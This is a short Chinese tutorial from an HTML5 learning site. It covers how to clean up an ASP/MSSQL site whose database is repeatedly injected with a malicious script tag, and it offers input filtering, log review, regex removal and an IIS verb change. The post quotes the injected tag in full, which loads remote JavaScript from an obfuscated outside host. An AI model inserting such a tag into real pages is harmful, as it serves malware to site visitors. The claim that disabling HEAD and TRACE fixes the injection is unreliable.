html5中文学习网

您的位置: 首页 > 网络编程 > ASP编程 » 正文

解决asp下SQL数据库的表被注入http://3%62omb.com/c.js的问题_ASP教程_编程技术

[ ] 已经帮助:人解决问题

网站是ASP的,数据库是MSSQL2000的,经常被注入下面的字符。

<script src=http://3%62omb.com/c.js></script>

这现象说明了网站的ASP程序有注入漏洞,要解决该问题,必须在保存到数据库前,进行过滤,还有表单提交过滤,网址过滤。
 
另外,通过检查日志文件 查找漏洞原因 然后及时修补 修补好后再用正则表达式 替换掉<script src=http://3%62omb.com/c.js></script>
 
同时,可以在服务器的IIS中,找到这个被挂马的网站属性,主目录中―配置中---找到.asp及.aspx的影射,将里面的中的HEAD操作与TRACE操作删除,只保留GET与POST就可以解决,

注意删除HEAD操作与TRACE操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作.
xDpHTML5中文学习网 - HTML5先行者学习网
xDpHTML5中文学习网 - HTML5先行者学习网
(责任编辑:)
推荐书籍
推荐资讯
关于HTML5先行者 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助